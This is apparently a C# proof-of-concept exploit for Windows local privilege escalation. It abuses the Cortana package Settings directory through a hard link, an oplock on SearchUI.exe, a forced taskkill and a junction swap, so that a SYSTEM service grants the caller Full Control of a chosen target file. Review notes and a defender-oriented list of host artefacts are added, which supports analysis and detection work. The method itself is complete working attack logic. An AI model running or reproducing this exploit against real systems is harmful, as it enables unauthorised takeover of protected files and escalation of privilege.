        /// <summary>
        /// Entry point of this proof-of-concept. Takes an optional target path from <paramref name="args"/>,
        /// checks the preconditions printed below (SYSTEM has Full Control of the target, the caller
        /// does not, Cortana is enabled and its process is running), then swaps the Cortana package
        /// <c>Settings</c> directory for a junction into a caller-owned temp directory that holds a
        /// hard link to the target file, timing the swap with an oplock held on <c>SearchUI.exe</c>.
        /// </summary>
        /// <param name="args">Optional single element: path of the target file. When absent, the
        /// class-level <c>fileToOwn</c> default is used (declared outside this listing).</param>
        /// <remarks>
        /// Defender view — the host-observable artefacts of a run are: a new directory <c>c:\{guid}</c>
        /// owned by the caller containing <c>foo.txt</c> (a hard link, not a copy), an open of
        /// <c>SearchUI.exe</c> with <c>OpenRequiringOplock</c>, a <c>taskkill /F /IM searchui.exe</c>
        /// child process, deletion of the Cortana <c>Settings</c> package directory, and its replacement
        /// by a junction. A DACL change on the target file that grants the caller or Authenticated Users
        /// rights it previously lacked is the final signal.
        /// Known issues are marked NOTE(review) inline; the method is one long block of sequential steps.
        /// </remarks>
        public static void Main(string[] args)
        {
            try
            {
                // Per-user LocalAppData; the Cortana package settings directory is assumed to live under it.
                string appLocalData = Environment.GetFolderPath((Environment.SpecialFolder.LocalApplicationData));
                string dirPackageSettingsToMount = $@"{appLocalData}\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings";
                //string tempDir = @"c:\fooDir";
                // Fresh, unpredictable directory name at the drive root; the caller becomes its owner (verified below).
                string tempDir = @"c:\" + Guid.NewGuid().ToString();

                // NOTE(review): fileToOwn, HasFullControl, NTAuthoritySystem, GetCortana, IsCortanaRunning,
                // HardLink, JunctionPoint, HasControl and authenticatedUsersGroup are declared outside this listing.
                if (args.Length < 1)
                {
                    Console.WriteLine($"[+] You should Specify a target filename. Default is {fileToOwn}");
                    args    = new string[1];
                    args[0] = fileToOwn;
                }
                else
                {
                    if (!File.Exists(args[0]))
                    {
                        Console.WriteLine($"[+] {args[0]} not found");
                        return;
                    }
                }


                // Precondition: the technique only helps when the privileged service already holds Full Control.
                if (!HasFullControl(args[0], NTAuthoritySystem))
                {
                    Console.WriteLine($@"[+] {NTAuthoritySystem} has no FULL access to {args[0]}. This exploits works only if SYSTEM has FULL control on target file");
                    return;
                }

                // Nothing to do if the caller already has Full Control.
                if (HasFullControl(args[0], WindowsIdentity.GetCurrent().Name))
                {
                    Console.WriteLine($@"[+] {WindowsIdentity.GetCurrent().Name} already has Full Control of {args[0]}");
                    return;
                }


                // A return value of 0 is treated as "Cortana disabled" (semantics of GetCortana are not visible here).
                if (GetCortana() == 0)
                {
                    Console.WriteLine("[+] Cortana disabled");
                    return;
                }

                if (!IsCortanaRunning())
                {
                    Console.WriteLine($@"[+] This exploit needs that Cortana process that is running ");
                    Console.WriteLine($@"[+] Start Cortana and run the exploit again  ");
                    Console.WriteLine($@"[+] From cmd : ""start ms-cortana:""");
                    return;
                }

                // Start from an empty temp directory; a pre-existing one (only possible on a GUID collision) is wiped.
                if (!Directory.Exists(tempDir))
                {
                    Directory.CreateDirectory(tempDir);
                }
                else
                {
                    Directory.Delete(tempDir, true);
                    Directory.CreateDirectory(tempDir);
                }
                Console.WriteLine($@"[+] Directory {tempDir} created");

                string dirOwner        = File.GetAccessControl(tempDir).GetOwner(typeof(NTAccount)).ToString();
                string currentUserName = WindowsIdentity.GetCurrent().Name;

                // NOTE(review): ToLower() is culture-sensitive; account-name comparison should use
                // string.Equals(a, b, StringComparison.OrdinalIgnoreCase).
                if (!currentUserName.ToLower().Equals(dirOwner.ToLower()))
                {
                    Console.WriteLine($@"[!] KO - Owner of Directory {tempDir} is {dirOwner} which is different from current user -> {currentUserName} ");
                    return;
                }

                Console.WriteLine($@"[+] Owner of Directory {tempDir} is current user -> {dirOwner} ");

                // NOTE(review): the link target is fileToOwn, not args[0], so the checks above and this
                // link can refer to different files when a path was passed on the command line.
                bool created = HardLink.CreateNtHardLink($@"{tempDir}\foo.txt", fileToOwn);
                if (!created)
                {
                    Console.WriteLine($@"[!] CreateHardLink from {tempDir}\foo.txt to {fileToOwn} failed ");
                    return;
                }
                Console.WriteLine($@"[+] Created HardLink from {tempDir}\foo.txt to {fileToOwn} ");


                // Get handle immediately upon service closing file
                // NOTE(review): ntFile is assigned on the worker thread and read on the main thread (below)
                // without any synchronisation or null check; if the worker has not assigned it within the
                // 1 s sleep, the read throws NullReferenceException, caught by the outer "ex 1" handler.
                NtFile ntFile = null;

                new Thread(() =>
                {
                    try
                    {
                        // Presumably P/Invoke wrappers (not visible here); raises this thread's scheduling priority.
                        IntPtr cThread = GetCurrentThread();
                        SetThreadPriority(cThread, ThreadPriority.THREAD_PRIORITY_HIGHEST);

                        // Exclusive (share-none) open that requests an oplock on the Cortana binary; the
                        // handle is closed by the main thread once the junction is in place.
                        ntFile = NtFile.Open($@"\??\c:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe", null,
                                             FileAccessRights.GenericRead | FileAccessRights.Synchronize,
                                             FileShareMode.None,
                                             FileOpenOptions.NonDirectoryFile | FileOpenOptions.OpenRequiringOplock |
                                             FileOpenOptions.SynchronousIoNonAlert);

                        if (ntFile.OpenResult == FileOpenResult.Opened)
                        {
                            Console.WriteLine($"[+] Oplock acquired - Opened with handle: {ntFile.Handle.DangerousGetHandle()}");
                        }
                        else
                        {
                            Console.WriteLine($"[+] Not acquired handle of : {ntFile.Name}");
                            return;
                        }

                        /*while (true)
                         * {
                         *  try
                         *  {
                         *      Directory.Delete(dirPackageSettingsToMount, true);
                         *  }
                         *  catch (Exception ex)
                         *  {
                         *      continue;
                         *  }
                         *  JunctionPoint.Create(dirPackageSettingsToMount, tempDir, true);
                         *  Console.WriteLine($@"[-] mountpoint created {dirPackageSettingsToMount} to {tempDir}");
                         *  Console.WriteLine($@"[-] Closing handle and free oplock");
                         *  ntFile.Close();
                         *  break;
                         * }*/

                        // Busy-wait until foo.txt disappears, then re-create the hard link.
                        // NOTE(review): this loop has no Sleep/yield and runs at highest priority, so it
                        // burns a full core until the file is removed; 'created' is the captured outer local.
                        Console.WriteLine($@"[-] checkin {tempDir}\foo.txt existance ");
                        while (true)
                        {
                            try
                            {
                                if (!File.Exists($@"{tempDir}\foo.txt"))
                                {
                                    created = HardLink.CreateNtHardLink($@"{tempDir}\foo.txt", fileToOwn);
                                    if (!created)
                                    {
                                        Console.WriteLine($@"[!] CreateHardLink from {tempDir}\foo.txt to {fileToOwn} failed ");
                                        return;
                                    }
                                    Console.WriteLine($@"[+] Created HardLink from {tempDir}\foo.txt to {fileToOwn} ");
                                    break;
                                }
                                continue;
                            }
                            catch (Exception ex)
                            {
                                Console.WriteLine($@"[+] ex 2 - {ex.Message} ");
                                break;
                            }
                        }

                        // Give the service some time to rewrite DACLs
                        System.Threading.Thread.Sleep(3000);

                        // Outcome check: either the caller got Full Control, or Authenticated Users got Modify.
                        // The temp directory is removed on every branch; the hard link itself is not.
                        if (HasFullControl(fileToOwn, WindowsIdentity.GetCurrent().Name))
                        {
                            Console.WriteLine($@"[+] Done - Exploit Succeded ");
                            Console.WriteLine($@"[+] Now {WindowsIdentity.GetCurrent().Name} has Full Control over {fileToOwn} ");
                            Directory.Delete(tempDir, true);
                        }
                        else if (HasControl(fileToOwn, authenticatedUsersGroup, FileSystemRights.Modify))
                        {
                            Console.WriteLine($@"[+] Done - Exploit Succeded ");
                            Console.WriteLine($@"[+] Now {authenticatedUsersGroup} has FileSystemRights.Modify over {fileToOwn} ");
                            Directory.Delete(tempDir, true);
                        }
                        else
                        {
                            Console.WriteLine($@"[!] Too bad... Exploit did not work out");
                            Directory.Delete(tempDir, true);
                        }

                        Console.WriteLine($@"[...] Exiting - Take care, Padovah4ck ");
                    }
                    catch (Exception ex)
                    {
                        Console.WriteLine($@"[+] ex 0 - {ex.Message} ");
                        return;
                    }
                }).Start();

                try
                {
                    // NOTE(review): a fixed 1 s delay stands in for real thread hand-off; see the ntFile note above.
                    Thread.Sleep(1000);
                    Console.WriteLine("[-] Cheking if oplock is acquired ");
                    if (ntFile.OpenResult == FileOpenResult.Opened)
                    {
                        Console.WriteLine("[-] OK - let's go.. Killing Cortana ");
                        //string sid = WindowsIdentity.GetCurrent().User.Value;
                        // KillProcessBySidAndProcessName(sid, "SearchUI");
                        // Fixed command line, no caller-controlled input; a taskkill child of this
                        // process is an easy process-creation detection point.
                        Process process = new Process();
                        process.StartInfo.FileName        = "taskkill.exe";
                        process.StartInfo.Arguments       = "/F /IM searchui.exe";
                        process.StartInfo.UseShellExecute = false;

                        process.Start();
                        process.WaitForExit();

                        Thread.Sleep(1000);

                        // Replace the package Settings directory with a junction to the caller-owned temp
                        // directory, then drop the oplock so the restarted service can proceed.
                        Console.WriteLine($@"[-] Trying to delete {dirPackageSettingsToMount} and create mountpoint ");
                        try
                        {
                            Directory.Delete(dirPackageSettingsToMount, true);
                        }
                        catch (Exception ex)
                        {
                            Console.WriteLine($@"[+] ex 1a - {ex.Message} ");
                            return;
                        }
                        JunctionPoint.Create(dirPackageSettingsToMount, tempDir, true);
                        Console.WriteLine($@"[-] mountpoint created {dirPackageSettingsToMount} to {tempDir}");
                        Console.WriteLine($@"[-] Closing handle and release oplock");
                        ntFile.Close();

                        /*Thread.Sleep(3000);
                         *
                         * process = new Process();
                         * process.StartInfo.FileName = "cmd.exe";
                         * process.StartInfo.Arguments = "/c start ms-cortana:";
                         * process.StartInfo.UseShellExecute = false;
                         * process.Start();
                         * process.WaitForExit();*/
                    }
                }
                catch (Exception ex)
                {
                    Console.WriteLine($@"[+] ex 1 - {ex.Message} ");
                    return;
                }
            }
            catch (Exception ex)
            {
                // Last-resort handler; only the message is printed, so the stack trace is lost.
                Console.WriteLine("Doh.. exception occurred " + ex.Message);
            }
        }